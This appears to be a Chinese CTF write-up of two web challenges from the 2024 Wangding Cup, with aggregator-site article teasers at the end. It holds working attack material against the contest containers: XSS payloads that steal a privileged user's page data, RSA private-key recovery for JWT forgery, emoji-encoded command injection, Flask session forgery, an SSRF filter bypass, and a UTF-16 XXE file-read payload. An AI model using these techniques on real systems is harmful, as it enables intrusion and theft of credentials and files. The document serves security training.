2024 网鼎杯 - 青龙组 Web WP

2024 网鼎杯 - 青龙组

WEB - 02

打开容器一个登录界面,随便输入账号密码可以进到漏洞界面

这里有一个发送给boss的功能,一眼xss

有三个接口:/flag 、/update 、/submit

  • /flag :要求boss才能访问,
  • /update : Post参数content
  • /submit :Post参数content_hash,账号唯一值

思路:/submit一个XSS请求,让boss访问/flag后,将/flag的内容Post到/update实现带外,最后在我们的页面上就能看到flag。

然后访问/flag,需要boss才能访问,这里我们就可以提交一个xss,然后让boss先访问/flag,再把数据带给我们的content里面

payload1:

<script>var xmlhttp = new XMLHttpRequest();
xmlhttp.withCredentials = true;xmlhttp.onreadystatechange = function() {if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {var flagData = xmlhttp.responseText;  var flag1 = btoa(flagData);var remoteServerUrl = '/content/4a95828e3f0037bfe446ae0e693912df';var xmlhttp2 = new XMLHttpRequest();xmlhttp2.open("POST", remoteServerUrl, true);xmlhttp2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");xmlhttp2.send("content=" + encodeURIComponent(flag1))}
};
xmlhttp.open('GET', '/flag', true);
xmlhttp.send();</script>

payload2:

<script>
fetch('/flag').then(response=>response.text()).then(data=>{fetch('/content/a9571d0
e889a28847d8682903',{method:'POST',headers:{'Content-Type':'application/x-www-form- 
urlencoded'},body:"content="+data});})
</script>

更新任务后,发送给boss

接着回到页面可以看到flag已经发过来了

在这里插入图片描述

WEB - 01

开局是一个登录界面,输入任意账号密码都可以登录,会给出一个唯一的session和jwt。

0x01 伪造JWT用户为admin

参考:https://ctftime.org/writeup/30541

思路:获取两个jwt值,通过这两个jwt值来获取公钥,再爆破私钥

工具:rsa_sign2n

https://github.com/silentsignal/rsa_sign2n

setup:
git clone https://github.com/silentsignal/rsa_sign2n.git
cd rsa_sign2n
cd standalone
pip3 install -r requirements.txt
try:
python3 jwt_forgery.py eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6ZmFsc2UsIm5vdyI6MTYzMjUzNjcyMC41NjkyMTk4fQ.DGGgcbIX160FUcUr6JWLn8HLGQM3n_DuIQ0tDx0AcTKXr_72_Z6LdMFo33yScKiobGFpjzlAg6lDMsCa4UkJqQfteA38Mo74B7ITHpjh0tnXrxejm20F-X23kTkKT_SLVw eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6ZmFsc2UsIm5vdyI6MTYzMjUzNjc0MS40NDAyMzA0fQ.DxCSrEVez5gtm_Xfjq1eaiGRf5PKNeYXti3loMHYMURKQdjILlp1dZlCSed1Y4R1B9mOsbAujxOYCLsdjQhzIbLV04XHZ96UOXH0dXaqNTb_PBxCsZ5ELs_CFX6qNm9MJA

在这里插入图片描述

 $ python3 jwt_forgery.py eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6ZmFsc2UsIm5vdyI6MTYzMjUzNjcyMC41NjkyMTk4fQ.DGGgcbIX160FUcUr6JWLn8HLGQM3n_DuIQ0tDx0AcTKXr_72_Z6LdMFo33yScKiobGFpjzlAg6lDMsCa4UkJqQfteA38Mo74B7ITHpjh0tnXrxejm20F-X23kTkKT_SLVw eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6ZmFsc2UsIm5vdyI6MTYzMjUzNjc0MS40NDAyMzA0fQ.DxCSrEVez5gtm_Xfjq1eaiGRf5PKNeYXti3loMHYMURKQdjILlp1dZlCSed1Y4R1B9mOsbAujxOYCLsdjQhzIbLV04XHZ96UOXH0dXaqNTb_PBxCsZ5ELs_CFX6qNm9MJA
[*] GCD:  0x1d
[*] GCD:  0x108b7c75aee1e2b9df3692a2cc54b100d111002193ebc9c3cf575e4b16f595cc28d9b47a65d1f3774aa3db05649085589230fe23bfcc2ef876b4134dafde4484d7bde8c9b80016d9c9aed53a0334ae3483cc833374301e1a7829a5f5800a793803        
[+] Found n with multiplier 1  :0x108b7c75aee1e2b9df3692a2cc54b100d111002193ebc9c3cf575e4b16f595cc28d9b47a65d1f3774aa3db05649085589230fe23bfcc2ef876b4134dafde4484d7bde8c9b80016d9c9aed53a0334ae3483cc833374301e1a7829a5f5800a793803
[+] Written to 108b7c75aee1e2b9_65537_x509.pem
[+] Tampered JWT: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTczMTA1NTc0NH0.lyqnPK5DTAuTUuPtYqHqpxBHvOOEvNW7LC3JEIp5nYI'
[+] Written to 108b7c75aee1e2b9_65537_pkcs1.pem
[+] Tampered JWT: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTczMTA1NTc0NH0.-57iIgXSr30CvqcRJFOhshZjzzetQQAYWjR2lkgb6Ow'
[+] Found n with multiplier 29  :0x920d1e8a71b85eaf6bd01744d6c84f79f7c2361f955f3bb7b3907e2cedfc567cfeadf290c09e76df43717bc5acb5265d51233f069d1c1a390f097e43db86c6c9a571f54cf72ced06f45fa0e5a0b68f0d5f53f8f259ef620424bf1a1ee5e0de9f
[+] Written to 920d1e8a71b85eaf_65537_x509.pem
[+] Tampered JWT: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTczMTA1NTc0NH0.x_6R5MJgV8_YFE8bfzFRR93r9Upf_nVLPTdzuOYnZLw'
[+] Written to 920d1e8a71b85eaf_65537_pkcs1.pem
[+] Tampered JWT: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTczMTA1NTc0NH0.R8n6JL3Z5HlCA5bp0wvNxxJag64RxMEAYctRkLgJXp4'
================================================================================
Here are your JWT's once again for your copypasting pleasure
================================================================================
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTczMTA1NTc0NH0.lyqnPK5DTAuTUuPtYqHqpxBHvOOEvNW7LC3JEIp5nYI
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTczMTA1NTc0NH0.-57iIgXSr30CvqcRJFOhshZjzzetQQAYWjR2lkgb6Ow
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTczMTA1NTc0NH0.x_6R5MJgV8_YFE8bfzFRR93r9Upf_nVLPTdzuOYnZLw
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTczMTA1NTc0NH0.R8n6JL3Z5HlCA5bp0wvNxxJag64RxMEAYctRkLgJXp4

获取到了公钥

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhEIt8da7h4rnfNpKizFSxANERACGT68nD
z1deSxb1lcwo2bR6ZdHzd0qj2wVkkIVYkjD+I7/MLvh2tBNNr95EhNe96Mm4ABbZ
ya7VOgM0rjSDzIMzdDAeGngppfWACnk4AwIDAQAB
-----END PUBLIC KEY-----

现在我们有了公钥,让我们使用另一个特殊工具来看看是否可以从中生成私钥(只有当它是一个“弱”公钥时才有可能)。

参考工具如下:https://github.com/RsaCtfTool/RsaCtfTool

setup:
git clone git@github.com:Ganapati/RsaCtfTool.git
cd RsaCtfTool
pip3 install -r requirements.txt
 $ python3 RsaCtfTool.py --publickey ./public.pem --private  
['./public.pem'][*] Testing key ./public.pem.
attack initialized...
attack initialized...
[*] Performing nonRSA attack on ./public.pem.
[+] Time elapsed: 0.0024 sec.
[*] Performing mersenne_primes attack on ./public.pem.27%|████████████████████████████████████████████████████▋                                                                                                                                           | 14/51 [00:00<00:00, 53723.93it/s]
[+] Time elapsed: 0.0317 sec.
[*] Performing pastctfprimes attack on ./public.pem.
[+] loading prime list file data/ti_rsa_signing_keys.txt...
100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 34/34 [00:00<00:00, 702494.27it/s]
[+] loading prime list file data/pastctfprimes.txt...
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 121/121 [00:00<00:00, 1185772.86it/s]
[+] loading prime list file data/visa_emv.txt...
100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 27413.75it/s]
[+] Time elapsed: 0.0037 sec.
[*] Performing lucas_gcd attack on ./public.pem.0%|                                                                                                                                                                                              | 6/9999 [00:00<00:00, 115971.54it/s]
[*] Attack success with lucas_gcd method !
[+] Total time elapsed min,max,avg: 0.0024/0.0317/0.0126 sec.Results for ./public.pem:Private key :
-----BEGIN RSA PRIVATE KEY-----
MIIB+wIBAAJhEIt8da7h4rnfNpKizFSxANERACGT68nDz1deSxb1lcwo2bR6ZdHz
d0qj2wVkkIVYkjD+I7/MLvh2tBNNr95EhNe96Mm4ABbZya7VOgM0rjSDzIMzdDAe
GngppfWACnk4AwIDAQABAmEKpfUIG6wBMAOtnv0vdki0XiDfW6KTMDRDvdcjryUd
sIi8WaAV8ZW9z9XWw/v8U/4DrOzW5nJwm2BwMRfpIfKlS/QW0gX/TR+btntJc6P8
wnks0vynK8S9A+l4kegxYrSxAmEAkg0einG4Xq9r0BdE1shPeffCNh+VXzu3s5B+
LO38Vnz+rfKQwJ5230Nxe8WstSZdUSM/Bp0cGjkPCX5D24bGyaVx9Uz3LO0G9F+g
5aC2jw1fU/jyWe9iBCS/Gh7l4N6fAgEdAmBhCOJfrQqHrhj9WlhcMx3KtTeNahJ+
AVkdrkSGaV+bvtQekehmcWIdF9wQFdeXS3P4cmhvZnbDXWGGNyOyeKseUhOSnJ4k
dR6HwflOVyaziHjre5zY79i5VAi7vAeTDZUCAQUCYG7MKNL1KsNqmGjlg6vEGPts
ga15EDaXO+lTIe0eeM7aaO3kJzEFdKlfTUNp0nfE1AiWUx+AA6n2UgczpjybNbN0
rroXE8nOS+WGVr/bBhQ/HC4MTevzZNcBZNYFyN+OZw==
-----END RSA PRIVATE KEY-----

成功获取私钥

那么接下来就可以伪造jwt了,可以用赛博厨子,jwt.io, https://www.bejson.com/jwt/等网站。

接着直接伪造jwt即可,成功伪造了用户名为admin的用户

0x02 伪造session

img

是一个emoji executor,参考https://naupjjin.github.io/2024/06/30/AIS3-pre-exam-2024-Writeup/

    "😀": ":D","😁": ":D","😂": ":')","🤣": "XD","😃": ":D","😄": ":D","😅": "':D","😆": "XD","😉": ";)","😊": ":)","😋": ":P","😎": "B)","😍": ":)","😘": ":*",#"😗": ":*",#"😙": ":*",#"😚": ":*",#"☺️": ":)","🙂": ":)","🤗": ":)","🤩": ":)","🤔": ":?",#"🤨": ":/",#"😐": ":|","😑": ":|","😶": ":|","🙄": ":/","😏": ":]","😣": ">:","😥": ":'(","😮": ":o","🤐": ":x","😯": ":o","😪": ":'(","😫": ">:(","😴": "Zzz","😌": ":)","😛": ":P","😜": ";P","😝": "XP","🤤": ":P","😒": ":/","😓": ";/",#"😔": ":(","😕": ":/",#"🙃": "(:","🤑": "$)","😲": ":O","☹️": ":(","🙁": ":(","😖": ">:(","😞": ":(","😟": ":(","😤": ">:(","😢": ":'(","😭": ":'(","😦": ":(","😧": ">:(","😨": ":O","😩": ">:(","🤯": ":O","😬": ":E","😰": ":(","😱": ":O","🥵": ">:(","🥶": ":(","😳": ":$","🤪": ":P","😵": "X(","🥴": ":P","😠": ">:(","😡": ">:(","🤬": "#$%&!","🤕": ":(","🤢": "X(","🤮": ":P","🤧": ":'(","😇": "O:)","🥳": ":D","🥺": ":'(","🤡": ":o)","🤠": "Y)","🤥": ":L","🤫": ":x","🤭": ":x","🐶": "dog","🐱": "cat",#"🐭": "mouse","🐹": "hamster","🐰": "rabbit","🦊": "fox","🐻": "bear","🐼": "panda","🐨": "koala","🐯": "tiger","🦁": "lion","🐮": "cow","🐷": "pig","🐽": "pig nose","🐸": "frog","🐒": "monkey","🐔": "chicken","🐧": "penguin","🐦": "bird","🐤": "baby chick","🐣": "hatching chick","🐥": "front-facing baby chick","🦆": "duck","🦅": "eagle","🦉": "owl","🦇": "bat","🐺": "wolf","🐗": "boar","🐴": "horse","🦄": "unicorn","🐝": "bee","🐛": "bug","🦋": "butterfly","🐌": "snail","🐞": "lady beetle","🐜": "ant","🦟": "mosquito","🦗": "cricket","🕷️": "spider","🕸️": "spider web","🦂": "scorpion","🐢": "turtle","🐍": "python", #"🦎": "lizard","🦖": "T-Rex","🦕": "sauropod","🐙": "octopus","🦑": "squid","🦐": "shrimp","🦞": "lobster","🦀": "crab","🐡": "blowfish","🐠": "tropical fish","🐟": "fish","🐬": "dolphin","🐳": "whale","🐋": "whale","🦈": "shark","🐊": "crocodile","🐅": "tiger","🐆": "leopard","🦓": "zebra","🦍": "gorilla","🦧": "orangutan","🦣": "mammoth","🐘": "elephant","🦛": "hippopotamus","🦏": "rhinoceros","🐪": "camel","🐫": "two-hump camel","🦒": "giraffe","🦘": "kangaroo","🦬": "bison","🦥": "sloth","🦦": "otter","🦨": "skunk","🦡": "badger","🐾": "paw prints","◼️": "black square","◻️": "white square","◾": "black medium square","◽": "white medium square","▪️": "black small square","▫️": "white small square","🔶": "large orange diamond","🔷": "large blue diamond","🔸": "small orange diamond","🔹": "small blue diamond","🔺": "triangle","🔻": "triangle","🔼": "triangle","🔽": "triangle","🔘": "circle","⚪": "circle","⚫": "black circle","🟠": "orange circle","🟢": "green circle","🔵": "blue circle","🟣": "purple circle","🟡": "yellow circle","🟤": "brown circle","⭕": "empty circle","🅰️": "A","🅱️": "B","🅾️": "O","ℹ️": "i","🅿️": "P","Ⓜ️": "M","🆎": "AB","🆑": "CL","🆒": "COOL","🆓": "FREE","🆔": "ID","🆕": "NEW","🆖": "NG","🆗": "OK","🆘": "SOS","🆙": "UP","🆚": "VS","㊗️": "祝","㊙️": "秘","🈺": "營","🈯": "指","🉐": "得","🈹": "割","🈚": "無","🈲": "禁","🈸": "申","🈴": "合","🈳": "空","🈵": "滿","🈶": "有","🈷️": "月","🚗": "car","🚕": "taxi","🚙": "SUV","🚌": "bus","🚎": "trolleybus","🏎️": "race car","🚓": "police car","🚑": "ambulance","🚒": "fire engine","🚐": "minibus","🚚": "delivery truck","🚛": "articulated lorry","🚜": "tractor","🛴": "kick scooter","🚲": "bicycle","🛵": "scooter","🏍️": "motorcycle","✈️": "airplane","🚀": "rocket","🛸": "UFO","🚁": "helicopter","🛶": "canoe","⛵": "sailboat","🚤": "speedboat","🛳️": "passenger ship","⛴️": "ferry","🛥️": "motor boat","🚢": "ship","👨": "man","👩": "woman","👶": "baby","🧓": "old man","👵": "old woman","💿": "CD","📀": "DVD","📱": "phone","💻": "laptop","🖥️": "pc","🖨️": "printer","⌨️": "keyboard","🖱️": "mouse","🖲️": "trackball","🕹️": "joystick","🗜️": "clamp","💾": "floppy disk","💽": "minidisc","☎️": "telephone","📟": "pager","📺": "television","📻": "radio","🎙️": "studio microphone","🎚️": "level slider","🎛️": "control knobs","⏰": "alarm clock","🕰️": "mantelpiece clock","⌚": "watch","📡": "satellite antenna","🔋": "battery","🔌": "plug","🚩": "flag","⓿": "0","❶": "1","❷": "2","❸": "3","❹": "4","❺": "5","❻": "6","❼": "7","❽": "8","❾": "9","❿": "10","⭐": "*","➕": "+","➖": "-","✖️": "×","➗": "÷"

先🐱 ⭐来查看所有文件(夹)

在这里插入图片描述

🐱 ⭐ = cat *

💿 🚩😜😐🐱 ⭐ = cd flag;p:|cat *

先用分号分隔,再用|去执行后面的命令

发现一个app.py

@app.route('/upload', methods=['GET', 'POST'])
def upload():token = request.cookies.get('token')if not token:flash('Please login first', 'warning')return redirect(url_for('login'))payload = decode_jwt(token)form = UploadForm()if not payload or payload['username'] != 'admin':error_message = 'You do not have permission to access this page.Your username is not admin.'return render_template('upload.html', form=form, error_message=error_message, username=payload['username'])if not session['role'] or session['role'] != 'admin':error_message = 'You do not have permission to access this page.Your role is not admin.'return render_template('upload.html', form=form, error_message=error_message, username=payload['username'])if form.validate_on_submit():file = form.avatar.dataif file:filename = secure_filename(file.filename)files = {'file': (filename, file.stream, file.content_type)}php_service_url = 'http://127.0.0.1/upload.php'response = requests.post(php_service_url, files=files)if response.status_code == 200:flash(response.text, 'success')else:flash('Failed to upload file to PHP service', 'danger')return render_template('upload.html', form=form)@app.route('/view_uploads', methods=['GET', 'POST'])
def view_uploads():token = request.cookies.get('token')form = GameForm()if not token:error_message = 'Please login first'return render_template('view_uploads.html', form=form, error_message=error_message)payload = decode_jwt(token)if not payload:error_message = 'Invalid or expired token. Please login again.'return render_template('view_uploads.html', form=form, error_message=error_message)if not payload['username']=='admin':error_message = 'You do not have permission to access this page.Your username is not admin'return render_template('view_uploads.html', form=form, error_message=error_message)user_input = Noneif form.validate_on_submit():filepath = form.user_input.datapathurl = request.form.get('path')if ("www.testctf.com" not in pathurl) or ("127.0.0.1" in pathurl) or ('/var/www/html/uploads/' not in filepath) or ('.' in filepath):error_message = "www.testctf.com must in path and /var/www/html/uploads/ must in filepath."return render_template('view_uploads.html', form=form, error_message=error_message)params = {'s': filepath}try:response = requests.get("http://"+pathurl, params=params, timeout=1)return render_template('view_uploads.html', form=form, user_input=response.text)except:error_message = "500! Server Error"return render_template('view_uploads.html', form=form, error_message=error_message)return render_template('view_uploads.html', form=form, user_input=user_input)

我们直接读源码,可以得到secret_key为36f8efbea152e50b23290e0ed707b4b0

则可以伪造session来实现访问/upload:

python flask_session_cookie_manager3.py encode -s "36f8efbea152e50b23290e0ed707b4b0" -t "{'csrf_token' : 'bbbbbbbbbbbbbbbbbbbbbb' , 'role' : 'admin'}"

session=eJyrVkouLkqLL8nPTs1TslJKwgqUdJSK8nNSgfKJKbmZeUq1ABeJEv4.ZyylsQ.hVb1LVDwhTxLtmPOecpia2ebRbA

0x03 文件上传

现在可以访问/upload路由了,主要是下面这部分:

将文件直接发送到内部的upload.php实现文件上传

    if form.validate_on_submit():file = form.avatar.dataif file:filename = secure_filename(file.filename)files = {'file': (filename, file.stream, file.content_type)}php_service_url = 'http://127.0.0.1/upload.php'response = requests.post(php_service_url, files=files)if response.status_code == 200:flash(response.text, 'success')else:flash('Failed to upload file to PHP service', 'danger')

在/view_upload路由下:

存在waf:

if (“www.testctf.com” not in pathurl) or (“127.0.0.1” in pathurl) or (‘/var/www/html/uploads/’ not in filepath) or (‘.’ in filepath):

要满足

  • “www.testctf.com” in pathurl
  • “127.0.0.1” not in pathurl

绕过:http://www.testctf.com@0.0.0.0、http://www.testctf.com@localhost,这种写法相当于user:passwd@host,@前面的是用户信息

  • ‘/var/www/html/uploads/’ in filepath
  • ‘.’ not in filepath

绕过(也不算):user_input=/var/www/html/uploads/60edfb32093e262bfccda5496e1cdaa8

过了waf后,访问http://+pathurl/?params=params

if form.validate_on_submit():    filepath = form.user_input.datapathurl = request.form.get('path')if ("www.testctf.com" not in pathurl) or ("127.0.0.1" in pathurl) or ('/var/www/html/uploads/' not in filepath) or ('.' in filepath):error_message = "www.testctf.com must in path and /var/www/html/uploads/ must in filepath."return render_template('view_uploads.html', form=form, error_message=error_message)params = {'s': filepath}try:response = requests.get("http://"+pathurl, params=params, timeout=1)return render_template('view_uploads.html', form=form, user_input=response.text)

Request:

POST /view_uploads HTTP/1.1    
Host: 0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 211
Origin: http://0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732
Connection: close
Referer: http://0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732/view_uploads
Cookie: session=eyJjc3JmX3Rva2VuIjoiYmQyNTJlZDZlYTQ5ZmJmOWQyZjJjMmQ0YTBlNjc1YzJhYzlmNmU5MyIsInJvbGUiOiJhZG1pbiJ9.ZyBmXg.eLZ3Z69hYgP6lG3vjiMNsKTLCno; token=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.DNqIFNdFOWgGGnuk95SQa5GdU_D6TDv95lTU97wUP8ekgqX6zrnvvsnp8XkvVfSx0g3xVQqbo5xhdxjNpM8LiiwX_kQ8FO8t0q0qBn1RJ5O2bGkGOZsUWAUrKg7ME6L4-XFiXi7P328f1t4En_kSp91SeS7-9Lcn7Ja__IJbRuH1
Upgrade-Insecure-Requests: 1
Priority: u=0, icsrf_token=ImJkMjUyZWQ2ZWE0OWZiZjlkMmYyYzJkNGEwZTY3NWMyYWM5ZjZlOTMi.ZyBmag.RCasLc0XUU8ep682nDtSZ5PeqsQ&path=www.testctf.com@0.0.0.0&user_input=/var/www/html/uploads/60edfb32093e262bfccda5496e1cdaa8&submit=Submit

然后先随便上传一个文件,然后读取,发现会报Failed to load XML file,猜测会解析xml,直接打xxe,但是过滤了system等许多关键字,那么采用utf-16编码绕过,直接读flag.php文件

<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/flag.php"> ]>  <userInfo><firstName>John</firstName><lastName>&example;</lastName></userInfo>

iconv -f utf8 -t utf16 1.xml>3.xml

然后上传3.xml,再去读取,得到flag

参考链接:https://www.cnblogs.com/Meteor-Kai/articles/18526034
https://www.cnblogs.com/gxngxngxn/p/18514445

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/467032.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MySQL核心业务大表归档过程

记录一下2年前的MySQL大表的归档&#xff0c;当时刚到公司&#xff0c;发现MySQL的业务核心库&#xff0c;超过亿条的有7张表&#xff0c;最大的表有9亿多条&#xff0c;有37张表超过5百万条&#xff0c;部分表行数如下&#xff1a; 在测试的MySQL环境 &#xff1a; pt-archiv…

stm32使用串口DMA实现数据的收发

前言 DMA的作用就是帮助CPU来传输数据&#xff0c;从而使CPU去完成更重要的任务&#xff0c;不浪费CPU的时间。 一、配置stm32cubeMX 这两个全添加上。参数配置一般默认即可 代码部分 只需要把上期文章里的HAL_UART_Transmit_IT(&huart2,DATE,2); 全都改为HAL_UART_Tra…

大数据分库分表方案

分库分表介绍 分库分表应用场景 分库分表介绍 大数据分库分表是一种数据库架构技术&#xff0c;旨在应对大数据量场景下的数据库性能瓶颈。以下是对大数据分库分表的详细解释&#xff1a; 一、定义与背景 定义&#xff1a; 分库&#xff1a;将一个大型数据库按照一定的规则…

基础算法练习--滑动窗口(已完结)

算法介绍 滑动窗口算法来自tcp协议的一种特性,它的高效使得其也变成了算法题的一种重要考点.滑动窗口的实现实际上也是通过两个指针前后遍历集合实现,但是因为它有固定的解题格式,我将其单独做成一个篇章. 滑动窗口的解题格式: 首先,定义两个指针left和right,与双指针不同的…

【spark的集群模式搭建】Standalone集群模式的搭建(简单明了的安装教程)

文章目录 1、使用Anaconda部署Python2、上传、解压、重命名3、创建软连接4、配置spark环境变量5、修改 spark-env.sh配置文件6、启动hdfs&#xff0c;创建文件夹7、修改spark-defaults.conf配置文件8、修改workers配置文件9、修改log4j.properties配置文件&#xff08;可选&…

Unity中IK动画与布偶死亡动画切换的实现

在Unity游戏开发中&#xff0c;Inverse Kinematics&#xff08;IK&#xff09;是创建逼真角色动画的强大工具。同时&#xff0c;能够在适当的时候切换到布偶物理状态来实现死亡动画等效果&#xff0c;可以极大地增强游戏的视觉体验。本文将详细介绍如何在Unity中利用IK实现常规…

2024阿里云CTF Web writeup

《Java代码审计》http://mp.weixin.qq.com/s?__bizMzkwNjY1Mzc0Nw&mid2247484219&idx1&sn73564e316a4c9794019f15dd6b3ba9f6&chksmc0e47a67f793f371e9f6a4fbc06e7929cb1480b7320fae34c32563307df3a28aca49d1a4addd&scene21#wechat_redirect 前言 又是周末…

云端到本地:深度学习日志与模型文件一键传输【详解 SCP 命令】

在深度学习项目中&#xff0c;模型的训练通常会在远程云服务器上进行。此过程会生成大量日志文件和模型文件&#xff08;如检查点文件、模型权重等&#xff09;&#xff0c;这些文件对于后续的分析、调试和备份至关重要。本文将介绍如何使用 scp 命令&#xff0c;将云服务器上的…

第10章 多表查询

一、什么是多表查询 多表查询&#xff0c;也称为关联查询&#xff0c;指两个或更多个表一起完成查询操作。 前提条件&#xff1a;这些一起查询的表之间是有关系的&#xff08;一对一、一对多&#xff09;&#xff0c;它们之间一定是有关联字段&#xff0c;这个关联字段可能建立…

如何让ffmpeg运行时从当前目录加载库,而不是从/lib64

程序在linux下运行时&#xff0c;一般从 /lib64 目录下加载依赖的库文件&#xff0c;如xxx.so. 有时候&#xff0c;系统里没有这些库&#xff0c;也不想从系统目录下加载&#xff0c;怎么办呢&#xff1f; 看下面的调整过程。 使用的源代码是 ffmpeg-6.1.tar.xz 解压后&…

智能提醒助理系列-jdk8升级到21,springboot2.3升级到3.3

本系列文章记录“智能提醒助理”产品建设历程&#xff0c;记录实践经验、巩固知识点、锻炼总结能力。 本篇介绍技术栈升级的过程&#xff0c;遇到的问题和解决方案。 一、需求出发点 智能提醒小程序 当前使用的是jdk8&#xff0c;springboot2.3,升级到jdk21和springboot3.3 学…

Redis-07 Redis哨兵

操作实现 此处应该6台虚拟机&#xff0c;其中3台是哨兵&#xff0c;但因为内存限制没有那么多 1.将sentinel文件拷贝到/myredis目录下 2.sentinel.conf文件重要参数 新建配置文件sentinel26379.conf sentinel26380.conf sentinel26381.conf bind 0.0.0.0 daemonize yes pr…

云上拼团GO指南——腾讯云博客部署案例,双11欢乐GO

知孤云出岫-CSDN博客 目录 腾讯云双11活动介绍 一.双十一活动入口 二.活动亮点 &#xff08;一&#xff09;双十一上云拼团Go (二&#xff09;省钱攻略 &#xff08;三&#xff09;上云&#xff0c;多类型服务器供您选择 三.会员双十一冲榜活动 (一)活动内容 &#x…

使用Python进行健康监测和分析的案例研究

健康监测和分析是指系统地使用健康数据来跟踪和评估个人或人群在一段时间内的健康状况。它包含一系列活动&#xff0c;从实时生理数据收集&#xff08;如心率&#xff0c;血压和体温&#xff09;到分析更复杂的健康记录&#xff08;包括患者病史&#xff0c;生活方式选择和遗传…

归并排序算法

1、基本思想 归并排序是建立在归并操作上的一种有效的排序算法&#xff0c;它采用分治法的策略。其基本思想是将一个待排序的数组分成两个或多个子数组&#xff0c;先对每个子数组进行排序&#xff0c;然后再将已排序的子数组合并成一个最终的排序数组。 对于两个有序的数组&am…

Mysql、Dm8达梦数据库通过脚本导出指定库所有表的结构详情信息到

目录 前言二、Mysql三、达梦8 前言 在当今复杂多变的数据环境中&#xff0c;数据库作为信息存储与管理的核心&#xff0c;其重要性不言而喻。随着业务的不断拓展和深化&#xff0c;对于数据库表结构的理解与管理成为了确保数据一致性和准确性的关键。特别是在跨数据库系统的场…

Android OpenGL ES详解——纹理过滤GL_NEAREST和GL_LINEAR的区别

目录 一、概念 1、纹理过滤 2、邻近过滤 3、线性过滤 二、邻近过滤和线性过滤的区别 三、源码下载 一、概念 1、纹理过滤 纹理坐标不依赖于分辨率(Resolution)&#xff0c;它可以是任意浮点值&#xff0c;所以OpenGL需要知道怎样将纹理像素(Texture Pixel&#xff0c;也…

在vscode中开发运行uni-app项目

确保电脑已经安装配置好了node、vue等相关环境依赖 进行项目的创建 vue create -p dcloudio/uni-preset-vue 项目名 vue create -p dcloudio/uni-preset-vue uni-app 选择模版 这里选择【默认模版】 项目创建成功后在vscode中打开 第一次打开项目 pages.json 文件会报错&a…

算法详解——链表的归并排序非递归解法

算法详解——链表的归并排序非递归解法 本文使用倍增法加上归并排序操作实现了对链表的快速排序&#xff0c;比起一般的递归式归并排序要节省空间并且实现要简单的多&#xff0c;比起一般的迭代式归并排序实现也要简单。 1. 题目假设 给定链表的头结点 head &#xff0c;请将其…

基于 SSM(Spring + Spring MVC + MyBatis)框架构建电器网上订购系统

基于 SSM&#xff08;Spring Spring MVC MyBatis&#xff09;框架构建电器网上订购系统可以为用户提供一个方便快捷的购物平台。以下将详细介绍该系统的开发流程&#xff0c;包括需求分析、技术选型、数据库设计、项目结构搭建、主要功能实现以及前端页面设计。 需求分析 …